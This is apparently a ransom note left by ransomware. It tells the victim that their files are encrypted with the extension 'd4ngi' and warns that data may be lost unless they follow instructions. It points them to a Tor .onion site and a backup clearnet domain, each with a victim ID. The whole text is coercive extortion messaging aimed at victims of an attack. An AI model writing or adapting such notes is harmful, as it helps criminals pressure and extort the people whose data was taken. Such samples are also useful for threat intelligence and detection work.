---=== Welcome Back ===---

[+] What's Happening? [+]

Your files have been encrypted and are currently inaccessible. You can identify them by their file extension: d4ngi. 
However, there's hope for recovery, but you must adhere to our instructions; otherwise, your data may be irreversibly lost.

#######################################################################################################
-----------------------++++++++++++++++++++++++++---------------------------------------------------
#######################################################################################################

[+] How to Access the Website? [+]

You have two options:

1) [Recommended] Use a TOR browser!
    a) Download and install TOR BROWSER from this link: https://torproject.org/
    b) Access our website: http://aplebs47wudmdbkslamslxlcj98snxlszskebdkcb.onion/D573027593759374
2)If TOR is blocked in your country, attempt to use a VPN! Alternatively, you can access our secondary website. Here's how:
    a) Open any browser (Chrome, Firefox, Opera, IE, Edge, Brave)
    b) Visit our secondary website: http://decoder0cd4ngi.re/D573027593759374
    
WARNING: The secondary website may be subject to blocking, making the first option preferable and more reliable.

